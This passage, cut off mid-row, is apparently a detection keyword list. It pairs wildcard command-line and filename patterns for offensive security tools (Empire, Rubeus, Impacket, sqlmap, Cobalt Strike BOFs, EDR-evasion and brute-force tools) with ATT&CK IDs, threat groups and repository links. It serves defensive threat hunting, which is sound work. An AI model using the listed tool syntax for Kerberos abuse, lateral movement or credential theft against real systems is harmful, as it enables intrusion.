-* -Target * -InitialGrooms *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Target * -Shellcode *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --target=* --payload=*cmd.exe /c*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -* -target-domain * -outputfile * -no-pass*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* targetedKerberoast.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --target-name * --domain * --dc-ip * --executable *.exe*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -* targets-asn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-map4to6.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-echo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-invalid-dst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-mld.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-multicast-slaac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-wordlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-sniffer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --target-user * --dc-ip * -command *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -* tdotnet publish Athena *,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* teamspeak2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* teamstracker.py*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,0,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -* telnet-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* telnet-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* telnet-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tftp-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tgssub * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* tgtdeleg /nowrap*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* tgtdeleg /spn:cifs*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -* tgtdeleg /target:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* thc-hidra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -* theHarvester.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* thief.py*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -* --threads * scan --buckets-file* ,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -* ticketsplease.*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -* TikiLoader*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -* tls-alpn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tls-nextprotoneg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tls-ticketbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tn3270-screen.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* TokenStrip.c *,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,0,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -* TokenStripBOF.o *,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,0,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -* tokenvator *,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -* -Tokenvator -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --tor *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* tor-consensus-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --tor-port*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --tor-type*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* traceroute-geolocation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --transformer donut*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --transformer Loader*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --transformer pe2sh*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --transformer sRDI*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* TSCHRPCAttack*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* tso-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tso-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* tweetshell.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,0,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -* --type asreproast*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,0,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -* --type search-spn*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - 